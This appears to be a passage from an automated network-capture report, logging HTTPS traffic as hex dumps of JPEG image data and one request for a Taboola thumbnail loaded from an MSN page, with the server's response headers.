                                                              2021-10-20 13:08:56 UTC45INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 09 09 08 0b 0c 0b 0c 0b 10 0f 0e 0e 0f 10 19 12 13 12 13 12 19 25 17 1b 17 17 1b 17 25 21 28 21 1e 21 28 21 3b 2f 29 29 2f 3b 45 3a 37 3a 45 53 4a 4a 53 69 63 69 89 89 b8 01 0c 0c 0c 0c 0c 0c 0d 0e 0e 0d 12 13 11 13 12 1b 18 16 16 18 1b 28 1d 1f 1d 1f 1d 28 3d 26 2d 26 26 2d 26 3d 36 42 35 32 35 42 36 61 4c 44 44 4c 61 70 5e 59 5e 70 88 7a 7a 88 ab a3 ab e0 e0 ff ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 01 02 03 08 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ba ba f9 80 00 08 01 22 27 20 08 00 01 20
                                                              Data Ascii: JFIF%%!(!!(!;/))/;E:7:ESJJSici((=&-&&-&=6B525B6aLDDLap^Y^pzz74"'
                                                              2021-10-20 13:08:56 UTC46INData Raw: a7 07 67 a2 7e 67 d2 eb 0e 66 c0 40 31 fa 08 0e 1e f6 a9 48 d3 8a f2 37 9d 63 5b e7 10 52 fc 10 d1 bf 3d a5 19 76 85 39 e8 f1 d6 fa d2 4b 11 04 fa 8f 27 95 a7 54 e4 d9 13 5e 0e cf 44 fc cf a5 b1 83 68 64 80 e3 f4 10 7c bd be ca 6f 11 d2 6a ff 00 5f 18 8c 9d e6 9d 6f 91 6c dd 60 ef 5a 79 bb d8 f3 e3 b4 9e 75 b7 0f ab f1 91 ce 84 b2 6d 31 31 e1 e9 f4 8f cc 7a 20 19 32 9a fb 0f a2 83 e3 ee 6e 8e 2b 12 72 a7 99 21 9f 29 74 d1 7c d0 15 b3 c7 04 f9 df ea bc 66 8c f4 94 5a 8c df 45 e6 37 6b 3a 2d a9 b1 2c e3 e9 f4 b7 cb fa 1a c8 33 00 ae f0 fa 58 0e 3f 41 b2 34 4f 55 64 d3 e1 75 af 9c 8a 2c da 89 b5 a1 53 36 5e 6c e9 8f a7 f1 d1 e5 a3 fa 16 7a bc 91 9d ea 9a f0 25 75 66 55 86 f7 ff 00 cf f6 b6 a7 a1 c4 de 26 11 8f bf 0f c7 de de 34 52 aa a9 cd 05 74 b3 ab f2 65
                                                              Data Ascii: g~gf@1H7c[R=v9K'T^Dhd|oj_ol`Zyum11z 2n+r!)t|fZE7k:-,3X?A4OUdu,S6^lz%ufU&4Rte
                                                              2021-10-20 13:08:56 UTC48INData Raw: 26 4b 39 98 b1 94 8d 48 0e 3f c6 a7 61 66 d2 5c 7a b7 11 57 48 b2 22 ea eb ac 99 30 cb 37 6c 1f d5 75 57 7b 66 b1 b3 ea a9 7e ad 61 a6 c9 8d 6d 3d 83 6b 1a d4 f8 b0 d5 7c f8 4d 8b 7e d7 dd dd ce 14 cd 82 ea 6c 4d bc 0a d3 85 e1 2d 85 9a ea ec 08 15 20 5e 43 13 d7 e2 29 ea 32 fd c1 f2 14 c4 ec 5f 32 4d b2 79 a0 b6 01 cc 54 ac 25 9d 66 3a 47 19 5d b6 00 66 65 5b 74 9d c8 a9 4a b0 58 d8 97 cb 78 fb 2f 59 09 ea 74 2b bd 43 65 06 00 d9 3b 0a 5c 8b a2 ca 58 f0 95 c6 72 53 65 6d 3b eb c4 69 35 27 af 35 f8 44 48 96 d6 23 ba 27 ee d5 59 cf e3 74 f4 38 f4 00 35 ee ed f4 c5 f3 0a 98 8e 23 36 f6 ba a7 53 b5 c6 b6 e7 b9 07 b6 d0 29 4b 9a c6 83 8a b4 db a6 7f 96 b5 43 b8 dd 14 48 42 9b bb de f9 b2 66 a2 75 55 ec da 0d 85 ba 6f 85 b4 c6 27 36 5b 39 d5 81 dd 1a f7 f6 0f
                                                              Data Ascii: &K9H?af\zWH"07luW{f~am=k|M~lM- ^C)2_2MyT%f:G]fe[tJXx/Yt+Ce;\XrSem;i5'5DH#'Yt85#6S)KCHBfuUo'6[9
                                                              2021-10-20 13:08:56 UTC49INData Raw: 8e 84 64 a6 22 22 d3 1f 04 15 ea a6 a7 a7 db 08 b5 69 8e d9 07 a6 b5 4a 26 4f 73 b8 e1 2e d6 d4 9b 94 ef e9 ad 02 77 fa 4b 31 2d 8e 9a 71 81 d9 4e 6f 6c 4d 0d 26 e2 e0 4f ee 54 5d 72 89 ba b2 0b c8 82 8b e3 d5 cb 1f 19 19 13 91 39 e9 2d 8f 1d fe d2 be 79 67 9c e7 9e 79 e7 9e 7a 82 5e 37 f5 0c 89 fa 89 82 89 c2 b9 dc fc e4 5b ee 23 e5 5b 29 12 19 8c d5 6f 74 f2 6d 33 8b 9c 93 54 89 36 1d aa fc c7 55 65 92 0a b2 bb 33 62 22 19 16 ea 1e a7 62 da d3 96 46 21 a5 31 89 6c 4e 73 f7 12 b8 66 ec e3 2c c7 90 54 06 b2 fc c3 1a f8 88 b4 70 cb 0d ef 08 3a 8e ff 00 a0 47 73 9e 3d 67 a6 45 21 cc d1 19 d6 78 ce 78 fc e1 0c fc 64 46 7a 8c 33 0c d0 96 00 7c 77 96 57 d7 8c c6 7d d1 82 53 13 9a 39 41 d9 62 6c ae f7 1a 46 ce b7 d1 d5 0d 3e 97 5f a6 ad f4 d5 92 68 13 99 90 2f
                                                              Data Ascii: d""iJ&Os.wK1-qNolM&OT]r9-ygyz^7[#[)otm3T6Ue3b"bF!1lNsf,Tp:Gs=gE!xxdFz3|wW}S9AblF>_h/
                                                              2021-10-20 13:08:56 UTC50INData Raw: 70 27 b2 18 89 e6 41 5b 65 c9 f7 6f 31 6a 94 ba 3a f9 5e 56 1e be 07 11 13 28 a3 d4 9b 07 ed ea 6c 3f a4 94 86 33 b9 f1 09 8d fb 60 c5 48 06 f0 a4 2e ef 38 d2 df 60 6a 0c ae b6 e5 d3 cf 31 85 f5 39 b2 71 31 d2 a5 e5 3a 15 b5 da 8f d4 62 75 d0 24 56 0f 1a a1 98 ca ba d7 ec ed 22 a2 8a 82 f4 fa 0a 83 ad a9 03 b3 1a 66 72 52 8b d7 77 b1 21 47 28 69 b5 ba d0 f3 0c df ed c3 5f af b6 df 64 ad 9e c8 81 90 7a 2a d0 8d 45 51 19 9f b6 62 27 3e 62 3e 32 b8 cc b9 31 31 61 f2 eb 57 1a 73 6f da 20 d7 88 02 05 87 0b 89 94 48 fd 35 41 13 26 2c 9c 23 18 6d 8e bc 66 16 cf 23 33 f2 b2 0c d8 ec 84 62 78 34 c1 b2 f4 8c e9 47 da a7 58 63 1e c9 00 9e 89 4b f7 5b d4 66 f2 da e8 ac 00 33 55 31 15 98 38 11 05 19 c6 ae a6 8e f6 b3 9b 96 e8 fe ac 2c 54 47 fa 62 99 10 a6 e9 c5 c4 27
                                                              Data Ascii: p'A[eo1j:^V(l?3`H.8`j19q1:bu$V"frRw!G(i_dz*EQb'>b>211aWso H5A&,#mf#3bx4GXcK[f3U18,TGb'
                                                              2021-10-20 13:08:56 UTC52INData Raw: 8e 6c 09 94 ea d2 73 a5 5e c7 a0 38 84 1d fe e2 17 38 53 be bc 7d 65 67 d4 d6 d2 31 f1 41 20 dc 4e 1e a8 f9 4e 37 b7 d6 29 3f 28 c6 72 63 f1 34 97 09 77 23 b6 df 78 95 9e ab 9b 85 00 0d 84 ed eb 2f 37 33 ac 39 31 b0 cc ac 2e 2f 38 7e 20 5c 53 a8 df 95 8f 5f 23 38 87 d1 59 ac 33 8b 7f 00 ce 48 01 98 9b 74 85 af 38 61 65 73 de d0 72 bd 8c bf 2a 8b ed 55 c0 e9 b1 f3 1b c7 01 96 de 70 bb 38 56 63 73 a4 0b fc 6d a3 35 b0 37 97 82 ec 6c 37 94 d0 d3 5d 07 70 73 04 b9 e4 76 99 7b 5b 09 d4 c3 a5 14 93 85 03 fe 25 5a 82 b6 b7 00 29 bd ad 13 20 8f 8b 7b 74 85 8f 43 ea 7f c0 97 e5 c1 53 bd ea 1e 9b 43 60 e4 9f e6 fd 60 52 48 18 84 1b 9c 5b 31 c8 5b 5f 27 a0 1d 66 96 6b 6b 1f 49 6b ee 41 33 89 ae 6b 36 80 7c 00 fd cc 00 00 49 32 e6 f0 3f 71 35 af 63 03 21 fe 69 6f 7c
                                                              Data Ascii: ls^88S}eg1A NN7)?(rc4w#x/7391./8~ \S_#8Y3Ht8aesr*Up8Vcsm57l7]psv{[%Z) {tCSC``RH[1[_'fkkIkA3k6|I2?q5c!io|
                                                              2021-10-20 13:08:56 UTC53INData Raw: 4b 53 66 24 4f 63 50 85 3a 0c a6 08 66 b8 b1 18 f7 12 8a 38 62 6f 73 b1 ed 0e 29 a8 fe a3 04 e8 3f 21 fd 79 de 24 fd 2e 49 94 45 93 d7 3c f8 87 02 9e 80 32 48 94 b3 51 6d eb 0d cc 27 c4 49 cb 13 73 28 ab 33 83 75 0a 0e 65 af b6 d2 d1 55 ce 6d 19 05 35 21 77 3f f1 2a d4 74 a8 54 85 6b 75 22 53 bd 89 3b 93 ee 1a 8e a5 c2 9b 03 08 f0 20 f5 3c ba 0f c8 7f 5e 7b 91 36 3e 92 f8 31 57 48 03 b0 e4 d2 b9 b3 7a 09 44 78 db c9 66 62 02 5c 00 04 d0 29 b5 3b ed b9 8a 01 16 96 44 df 27 b4 6a ac d8 18 12 f6 56 7b 5e c2 31 2c cc cd b9 39 80 58 01 ee 1d cc 6d 93 d3 f5 3c ba 7f 69 e6 a3 37 81 ac 18 fd a5 3d 80 3d 08 87 95 c0 0c c7 61 98 ec 6d 9d d8 dd a5 0d ea 1f 4e 5c 21 51 c4 0d 67 71 61 1d 11 b0 dd 20 f0 fc 91 07 7d e3 05 5c b6 d2 f7 37 38 02 61 aa 31 03 05 8d bd d3 d7
                                                              Data Ascii: KSf$OcP:f8bos)?!y$.IE<2HQm'Is(3ueUm5!w?*tTku"S; <^{6>1WHzDxfb\);D'jV{^1,9Xm<i7==amN\!Qgqa }\78a1
                                                              2021-10-20 13:08:56 UTC54INData Raw: ff 00 29 b0 a0 0a 8f ee 67 65 c1 e8 56 c8 f6 d8 7d 07 48 cc 4b 00 a2 fa 93 b0 81 45 51 d7 a9 8d 85 49 d0 d4 f4 0f c9 81 87 16 51 f0 5f 94 bf 5c c4 c1 95 f5 ae 11 d4 c3 88 e2 50 43 dd 1b a3 15 83 78 1e 9d f9 9b d2 66 ca 49 e7 5f 48 b6 be d6 a4 ec 35 84 63 72 4b 8e 54 2b 43 19 70 81 a0 70 49 d8 93 08 b3 af 2d bc 3b bb 16 10 4f a6 7d 81 f6 07 53 d6 3b 71 02 20 d2 0e eb 97 0d 36 8c 01 8e 98 f5 e1 b1 5a 75 b2 79 42 0a 92 0e e3 d4 f0 13 2e 32 8a a6 ef 5a 30 3f 06 34 b3 66 a1 a7 36 c7 48 e1 1a a8 91 e4 67 a4 75 20 3d 30 eb 06 7c 60 8e 20 54 f2 e8 60 60 49 36 2e cc 62 36 98 c0 77 0a 66 55 45 2b 57 67 94 c5 89 31 0e 3c c2 c9 15 c3 57 50 26 27 3c 69 88 6d 46 c6 90 ab 37 bc 60 5a d0 09 c2 65 19 46 57 73 b1 03 4d f9 44 03 88 9e 4b ec 8f dc ce d0 2c 2b 74 35 ea 63 5e
                                                              Data Ascii: )geV}HKEQIQ_\PCxfI_H5crKT+CppI-;O}S;q 6ZuyB.2Z0?4f6Hgu =0|` T``I6.b6wfUE+Wg1<WP&'<imF7`ZeFWsMDK,+t5c^
                                                              2021-10-20 13:08:56 UTC56INData Raw: ad bf 5a 86 37 bc 7e 65 87 b9 b5 68 05 09 94 5a 8f 38 e2 9d 87 8c 13 b3 a8 e2 f4 87 96 d1 27 6b 34 d8 c7 45 32 c4 1b 8e 82 67 e1 f4 ac 46 80 cd fb ae 84 17 ef 59 15 b4 f4 8c f8 31 96 3a 91 af a9 cc 79 ca d6 63 f7 07 89 27 ea 6e 1d e3 7b e7 cd 3b d7 53 7f fe d7 5e e3 44 4c d8 6e fa 88 30 b9 34 74 11 40 a3 5c aa a0 e5 3b 66 b9 17 c1 3b 9a b8 5f e5 8d 4f 7e 71 96 a0 f1 9a 5f 84 3e d1 0a 23 68 11 40 a0 17 6f 53 18 bc 8b 18 d0 63 d0 18 07 0a a8 e8 00 9c e3 7b e7 cd 7b 9b dd 6f 23 36 06 bf 11 ef 35 74 65 18 ab a5 40 35 13 21 f4 8e ed ca f4 f2 1d df ff c4 00 43 10 00 02 02 01 02 03 05 04 06 08 03 07 05 00 00 00 01 02 03 11 00 12 21 04 31 41 13 22 51 61 71 05 10 32 91 20 30 42 81 a1 b1 14 23 52 62 72 82 b2 c1 40 54 92 06 43 83 a2 c2 d1 e1 24 34 50 53 e3 ff da 00
                                                              Data Ascii: Z7~ehZ8'k4E2gFY1:yc'n{;S^DLn04t@\;f;_O~q_>#h@oSc{{o#65te@5!C!1A"Qaq2 0B#Rbr@TC$4PS
                                                              2021-10-20 13:08:56 UTC57INData Raw: 8b b2 e6 d1 67 21 71 f4 ed b3 c8 cd 8a be 8b 47 00 67 82 bf 94 10 5b 15 a5 55 d4 a8 a6 c9 d3 cd 47 8e 76 65 9a d5 b0 08 db 87 d6 d5 b8 b4 17 a9 4e 35 1b d2 39 11 47 eb 76 24 10 7c 08 37 78 4a 9d 21 ab a6 8c d6 88 9d c8 c7 56 e4 09 cb 55 27 4a 47 b9 62 31 92 3e 1f 87 7b 72 45 92 d2 2a e6 e6 65 18 06 f8 3d d7 19 8d c3 83 e0 c2 b0 46 e8 c4 6c 34 dd 1b 03 fb 8c 09 c4 a4 9a 24 24 69 b7 3b 86 f5 37 85 62 6b 59 2b 76 60 0d e9 f2 c0 a8 a0 05 51 c8 01 f5 c1 e4 74 b4 e1 c7 c4 de 6d fb 2b e7 89 04 6f b8 85 07 a1 1a b1 25 24 0b 12 3b 0e 47 61 74 75 7d f8 b1 50 82 25 0a 36 b0 cc e7 28 8e 22 2f ea c1 cc d6 6d a8 0f 77 79 ce 17 8b 82 58 95 25 e8 f3 46 5f b4 08 7a 8d c2 f9 b0 c2 04 fc 03 b5 37 30 f1 91 a7 1a 45 e2 38 54 77 f2 96 a9 ff 00 11 f5 c9 2f b4 25 15 0c 1d 16 f9
                                                              Data Ascii: g!qGg[UGveN59Gv$|7xJ!VU'JGb1>{rE*e=Fl4$$i;7bkY+v`Qtm+o%$;Gatu}P%6("/mwyX%F_z70E8Tw/%
                                                              2021-10-20 13:08:56 UTC59INData Raw: 05 d6 e5 ad d5 54 e0 44 ae f3 91 6c e7 c4 9c d3 5d 3a 1c 3a 5c ac 13 f4 d1 22 f2 3e 84 7b ff 00 f7 7e d2 89 1d 7c 51 14 bf e6 06 07 ec a5 88 a9 17 cc 1e 58 0c ae 4b 1d 24 3b d9 3d 4d d0 19 b9 d3 67 ee fa 3f ee 67 fe 8f a5 d6 7f c9 33 6c f4 f7 fc 16 3e 78 aa 00 e4 31 15 01 db 55 d9 18 cb 67 9f 31 8e a2 59 ca 95 08 43 28 4f 82 40 4e 36 c0 2b 03 cc 11 ee b7 82 29 78 87 ff 00 8a 42 af f4 65 a7 0f 21 44 8a 87 7e 5a bb 6b e8 b8 55 63 8c e9 4a 1b 93 b0 19 b9 55 fc be 8f 38 67 fe 8f a5 d6 7f fa 3e 8f 5e f7 a9 eb 87 b0 53 f0 fe d9 ff 00 b6 05 5b e5 85 23 27 51 62 2b 61 be 6d 22 ea 7f 53 9f 1a a1 0b e9 77 ee da 1a 89 07 94 48 03 67 0b 3c 5a c4 a3 5b ba b0 7b e6 d4 c0 1c e1 78 39 6d 3b f0 17 67 f8 b4 d7 7c b0 1f 16 13 a1 23 fc 47 fe 3e 8f ff 00 7f e3 13 7d 2f f3 1f
                                                              Data Ascii: TDl]::\">{~|QXK$;=Mg?g3l>x1Ug1YC(O@N6+)xBe!D~ZkUcJU8g>^S[#'Qb+am"SwHg<Z[{x9m;g|#G>}/
                                                              2021-10-20 13:08:56 UTC60INData Raw: 17 33 93 d7 bc f7 80 54 72 d0 2d 7c e4 63 58 6c 5d 03 e7 d3 2b ff 00 4c d7 ce f6 62 2c 65 d2 93 cf cb 37 0b ce f1 83 28 01 7c 2c 6c 37 f2 02 f1 99 46 9d 44 9b a4 19 73 c3 ec f9 e1 8b d2 50 1f 39 46 33 98 cd d9 82 8c 05 d1 0d 20 1b a5 1e ed ff 00 17 3c b6 56 5d 47 ce bd c0 2f 66 f1 82 7a 17 1b 1c d4 ac 45 d1 af 43 8f 24 68 6c a0 62 01 f2 f3 c5 8e 25 5a 55 1b 05 03 2c f5 73 f0 a8 f1 38 0a aa 16 9a 47 fb 58 b1 a6 b7 91 17 a0 2e d4 9f 22 73 ba 8a 11 77 da 80 af 76 fe 99 b2 db 1f bb 3e 37 d5 e1 f1 1c d2 3f 44 83 6b 04 8b 5d 59 b0 b6 06 bc 0e 00 7b 19 81 5b 1b f7 df 28 95 3b 7a e0 d6 c3 08 66 00 02 0d ee db 7e 41 b3 f5 f2 ad b8 ea a3 09 d7 0a 30 50 68 ea 57 d2 47 c9 b0 a8 8b 8a 90 2a fe e9 36 be ea 8a 17 ec 20 1f b7 29 1b b7 a2 e4 a5 22 60 24 ed 40 37 29 f4 e6
                                                              Data Ascii: 3Tr-|cXl]+Lb,e7(|,l7FDsP9F3 <V]G/fzEC$hlb%ZU,s8GX."swv>7?Dk]Y{[(;zf~A0PhWG*6 )"`$@7)


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.549836151.101.1.44443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:55 UTC16OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC32INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 10756
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 623105471311786779303628346285156873834,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "530961f46738bb75e8a8c20ef3ac7b8b"
                                                              expiration: expiry-date="Sat, 02 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Wed, 01 Sep 2021 04:44:02 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 100
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 21
                                                              X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:55 GMT
                                                              Age: 2502654
                                                              X-Served-By: cache-wdc5571-WDC, cache-dca17782-DCA, cache-mxp6972-MXP
                                                              X-Cache: HIT, HIT, HIT
                                                              X-Cache-Hits: 1, 1, 1
                                                              X-Timer: S1634735336.999038,VS0,VE1
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg
                                                              X-vcl-time-ms: 1
                                                              2021-10-20 13:08:56 UTC33INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 cf 00 06 00 03 00 00 00 00 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72
                                                              Data Ascii: JFIF@ICC_PROFILE0ADBEmntrRGB XYZ acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
                                                              2021-10-20 13:08:56 UTC35INData Raw: 63 85 3a b6 30 b5 9d 0f 38 d2 7b 38 c3 84 66 5d e9 e5 1c e2 8a c2 2a 46 57 4d 8a f8 eb 5e 54 a2 67 8b 3a 65 6f be 6c 49 67 b8 ad 4d 52 00 76 8d 00 54 b5 2a 2c c8 47 f1 b9 17 8e b2 69 f7 fc ef 41 74 c0 c2 bc 7d 39 96 bb 9c b7 fb 1e 4d d1 a6 40 bc d7 65 f4 97 2b 2e cb 37 da 2e 62 95 cc da b9 79 81 f5 6a 60 a0 bb 59 e3 25 8a 94 e0 20 38 41 e6 55 24 98 ca 19 96 80 3c 93 6e b2 0b 60 e6 db aa 93 4f 35 97 b3 83 13 be 35 42 6b 79 15 a7 fa 0d 4b 93 23 b9 a0 3a c6 c2 54 eb 48 66 a4 32 6d af bb e5 7a 30 67 12 9d 9d bb d1 b4 54 83 62 10 ca 9a ce 86 a4 e7 20 10 d9 1a 13 4f 67 64 94 5a d1 25 b8 65 fa 3a ae b0 67 3f 60 20 d1 45 96 a5 44 26 68 d9 71 9b 47 fe 03 b2 3a d7 c5 1c 9a a2 74 7d 6e 1e 88 f0 cd 87 27 5a 68 c4 d6 aa fa de 79 4d 17 32 da a0 88 3f 8c e6 e6 80 79 34
                                                              Data Ascii: c:08{8f]*FWM^Tg:eolIgMRvT*,GiAt}9M@e+.7.byj`Y% 8AU$<n`O55BkyK#:THf2mz0gTb OgdZ%e:g?` ED&hqG:t}n'ZhyM2?y4
                                                              2021-10-20 13:08:56 UTC36INData Raw: 33 77 a3 fc 34 84 a9 19 aa 91 b8 9a 33 95 24 1e d7 fa 9c 94 7d b9 74 7d c7 26 19 70 7c e4 e3 ee 38 e3 2d 2e 15 f7 80 60 19 c6 01 c9 cd ec 82 49 b8 ed ea 18 bb 2e 45 2a 9d 4b a4 a8 63 e6 2b b1 c3 1b f7 b2 ac d3 a8 48 55 bc f2 56 a8 e8 cd 4a c4 8e ca b2 08 27 1f bb 18 af 68 0c 35 8d db 60 8c 8f b8 4a 30 7c 7f 43 8e 3d 1c bc 3d e4 c3 2e 0f 9c 9c 7d c7 1c 65 91 f3 8c 3d e0 c1 9c e7 39 bb 3d 9b 17 8c 1d f0 56 85 06 50 b0 50 a8 ca d7 f5 35 e1 91 ed 59 d2 f5 34 16 15 7c 51 cc 14 d1 05 56 eb 9e c0 50 c9 53 a9 64 98 fd 3d bf 1e de 8a a1 b5 95 1c 2d 94 3d b0 77 9b 08 ac bf d0 e3 0f 59 7d 72 61 97 47 ce 58 fd d8 e3 2c 0f 59 27 a3 9c e7 76 77 61 7c ea 37 8e 1d b5 72 e3 78 d1 49 49 64 47 af cf 9b 9e 20 4e 96 d5 d7 8e 6d 81 88 56 b8 51 a0 ad d3 fb 6b b5 b7 f7 f5 57 25
                                                              Data Ascii: 3w43$}t}&p|8-.`I.E*Kc+HUVJ'h5`J0|C==.}e=9=VPP5Y4|QVPSd=-=wY}raGX,Y'vwa|7rxIIdG NmVQkW%
                                                              2021-10-20 13:08:56 UTC37INData Raw: 1f 6a 99 1f 38 0c 78 39 54 92 f7 3b b3 68 ef 5b 5e 5e 21 aa a3 1e ba 95 7a aa 7a 9b 50 9b 8a b0 41 d8 db 03 af eb 7a 7b c7 8e 95 5a 96 ac 3b a8 93 53 1a 5b 91 dc 45 59 d1 0a 65 dd 4d 81 3b 78 6b 49 ad d9 5c 88 c5 18 e9 ba 17 f4 35 f6 37 f5 15 f5 9b fd 4e dd bc 30 4d 3c 12 af 1d d1 75 25 0b 97 fa 63 71 56 b2 de b1 1e a3 a5 20 ab 50 6e ea ae 83 a2 d3 5e 99 2d 51 3e fb a2 a9 15 d9 dd 45 da 35 c9 53 57 59 f5 3a d5 16 4a 3b ca 4b 73 b1 b0 7a 79 12 c0 4e da 96 22 49 10 08 51 40 ec 11 10 d1 a9 e6 36 fb 01 39 0c a2 51 91 32 a9 93 85 54 37 36 2d 3c 8b 1d c2 9b d9 2b e5 e2 3e af 54 83 25 d6 c1 6f ab f4 74 a4 4e 9a e6 7d 15 19 4e 54 ed d8 53 11 ca 2b c8 a2 46 86 5c 29 fc 65 b3 32 d7 99 63 cf f8 fe f4 56 f4 d3 6a 9b 37 94 75 db 4d 55 9a fb 1a bd 2f d2 ee 95 e6 9a 5d
                                                              Data Ascii: j8x9T;h[^^!zzPAz{Z;S[EYeM;xkI\57N0M<u%cqV Pn^-Q>E5SWY:J;KszyN"IQ@69Q2T76-<+>T%otN}NTS+F\)e2cVj7uMU/]
                                                              2021-10-20 13:08:56 UTC39INData Raw: 04 cf 0a ea 65 b2 9c fb 31 4f 13 10 39 86 08 e4 03 d4 75 82 7c 08 d3 93 c7 1b ae 92 ad bd b1 5e 69 55 ff 00 e3 9d 7a 2f da 25 e8 75 0e 0a 91 d0 ed df c9 7d 0e b6 5d 6c 12 d7 7c dd eb 0e c6 99 ac c9 a1 d7 da d0 d7 82 a9 82 57 00 72 a3 cc 63 ea 9d 6c dc db 7f 25 49 83 2d 34 58 c8 07 35 37 e3 a8 92 c2 d8 d1 c5 3c be c6 a6 b4 63 8c 9e 01 e3 f4 3c 6b f9 c9 97 c6 a4 82 9e 2b 70 3c 33 a6 df a5 df 4d 34 af 41 2a d0 8a f5 62 b5 ae c7 a4 b9 f5 9d b2 c7 b9 86 ce bb 6d b1 a1 23 69 d2 49 a7 1d c6 85 74 58 c7 af 1a 7f 0b 1a 83 f1 19 e3 f0 cc 48 f8 11 f7 9f 84 ac bf c3 57 4e 3e 0c 09 86 04 23 8e 36 4f f4 80 b7 17 6c 83 3e aa 74 8a 7b 1e a4 45 65 af e5 98 7a 4a c8 f1 a9 c8 a2 ed 90 9c d6 48 e9 28 c7 98 18 f2 47 1c e5 d9 78 4e 03 52 90 01 ef 2e b2 4c bc 1c 4a eb 1c 91 cf
                                                              Data Ascii: e1O9u|^iUz/%u}]l|Wrcl%I-4X57<c<k+p<3M4A*bm#iItXHWN>#6Ol>t{EezJH(GxNR.LJ
                                                              2021-10-20 13:08:56 UTC40INData Raw: 43 5c 8a 9a cd a5 b1 49 77 4c 4d d8 92 30 22 ed 1b 0a ab 44 a6 a4 42 56 3d 48 2d d8 9c 64 cf 82 8e c8 dc c5 98 8a 3a 12 6b d9 d3 d3 bc 95 d0 ba 7a 6d 6c 8a bd 1c 5f 02 e8 ed c1 52 8c 60 27 14 29 c4 ce 26 68 71 4f 9e e8 84 9a 23 56 7e 4f 52 7e 4f 52 7e 4a b3 93 7a b1 b6 5d 97 7e 4b 99 3f 27 ff c4 00 2b 11 00 02 02 01 03 03 03 04 02 03 01 00 00 00 00 00 01 02 00 11 03 12 21 31 10 41 51 04 20 71 22 32 61 81 13 14 05 23 72 91 ff da 00 08 01 02 01 01 3f 00 97 d2 e5 cb e9 46 54 da 31 80 c1 2e 5c b9 72 fa 17 d3 35 cd 46 59 8c 77 82 2f 4b f6 b7 31 2b bc ff 00 5f e6 31 4e d7 0e e6 08 be dd 26 ae 3e 45 58 d9 e6 3c 8a df 3e d5 97 d4 6e 63 9d a3 ee 66 91 38 31 0d 80 7d 8b ec 5e 63 0b 58 d8 d8 6e 14 d7 9e 85 07 21 81 98 be d0 3f 3e c5 f6 2f 31 8e 95 b9 90 ae f6 cc 5b
                                                              Data Ascii: C\IwLM0"DBV=H-d:kzml_R`')&hqO#V~OR~OR~Jz]~K?'+!1AQ q"2a#r?FT1.\r5FYw/K1+_1N&>EX<>ncf81}^cXn!?>/1[
